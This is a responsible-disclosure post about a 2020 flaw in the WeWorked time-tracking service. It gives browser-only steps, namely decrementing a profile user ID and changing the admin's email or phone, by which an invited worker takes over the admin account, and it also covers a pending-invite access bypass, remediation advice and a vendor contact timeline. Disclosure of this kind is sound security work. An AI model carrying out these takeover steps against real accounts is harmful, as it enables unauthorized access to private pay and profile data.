WeWorked 0-day: unauthorized users can gain admin access and change their own pay rate

Summary

Any person that is invited to a team is able to gain access to any other account on that team. This includes admins and therefore any person is able to see all user profile info on their team and change anything an admin can change.

Also, any user that is invited to a team is able to access the account while their status is still listed as a “pending invite”.

Specification

An admin does not expect that pay rates and other private information will be visible and editable by non-admins.

Steps required to access admin account

1. Create an admin account on WeWorked.com (using the Try WeWorked for Free button).
   1. ℹ️ In some of our tests, this did NOT result in the necessary “Invitation” being sent.
2. Login as admin and invite a person to your account.
   • Do this here: https://weworked.com/app/manage.php?p=manage_users.php.
   • Do NOT give this person administrator access.
3. Logout as admin and separately login as worker (set password).
4. As worker, access their own profile.
   • Click “profile” on their main page.
   • This is, for example: https://weworked.com/app/profile.php?uid=74858.
5. As worker, decrement the user ID in the URL and load page.
   1. If this pulls up that same person’s profile, then continue to decrement and try again.
   2. This will eventually load the admin profile page.
6. As worker, edit admin profile email address and save.
7. Logout as worker, access email to get change password email.
   1. ℹ️ In some of our tests, this did NOT send a change password email.
   2. ℹ️ I worked around this by instead changing the admin’s phone number and getting the “Reset Password” text.
8. The worker can now login as admin using the resetted password.
   1. The worker can use the admin account with actually changing the password from the temporary “reset” password.
9. The worker is now able to change their own pay rate, delete other workers, and anything else the admin could do.

Steps to access account while remaining a “pending invite”

1. Login as admin and invite a person to your account.
2. Logout as admin and separately login as worker using the welcome email.
   1. This presents a “change your password” screen.
3. Do NOT set a password on this screen. Instead directly go to the URL: https://weworked.com/app/profile.php and access the features of the WeWorked app.
4. Logout as worker and and login again as admin.
5. Access https://weworked.com/app/manage.php?p=manage_users.php and find the worker below.

It is expected that this worker will be listed under “Active Users”, but instead they are under “Pending Invites”.

Other notes

1. We believe the worker is NOT able to access any information from other teams’ accounts.
2. The admin will see something different when this attack happens, because their password will have changed.
   1. 👍 This is a defense-in-depth mitigation.

Recommendations

1. Only admin should be able to read or write priviledged information on the user profiles pages, because that is what we expect an “admin” to have access to.
   1. Example page: https://weworked.com/app/profile.php?p=profile_editworkinfo.php&uid=74862
   2. A normal user loading this page should see less, or have less edit permissions.
2. When a user account password is changed this should trigger an email and/or SMS to that person. This could have alerted the admin in our above scenario.
3. This website could add two-factor authentication. Depending on the implementation, this could have prevented the worker from gaining access to the admin account.
4. At the beginning, the free signup did not generate a welcome email (but the admin invitation did). This could be fixed because otherwise new potential customers will not be able to access the account.
5. A new user should not be allowed to use WeWorked app features while they are still in “pending invite” status. In other words users in “pending invite” status should not be allowed to access app features.
6. Consider to review other endpoints because they may also be vulnerable.

Tools used to discover bug

I used a stock Safari installation and accessed URLs that WeWorked shows you when you are creating at account from the “Try WeWorked for FREE” button.

Test date

May 2020

Disclosure schedule

• 2020-02-25 Discovery first sent to vendor
• 2020-02 through 2020-04 Sent 7 emails to vendor summarizing the issue
• 2020-04-14 Tweeted at the company to summarize the issue
• 2020-05-17 Wrote up and live streamed the discovery
• 2020-05-17 Posted to Privacy Log and notified vendor by email and Twitter

Acknowledgements

• Thank you to t012nad0 and definitelynotlisp for notes on recommended password best practices.

▧

Comments

There are no comments yet.

Please discuss this topic anywhere and let me know any great comments or media coverage I should link here.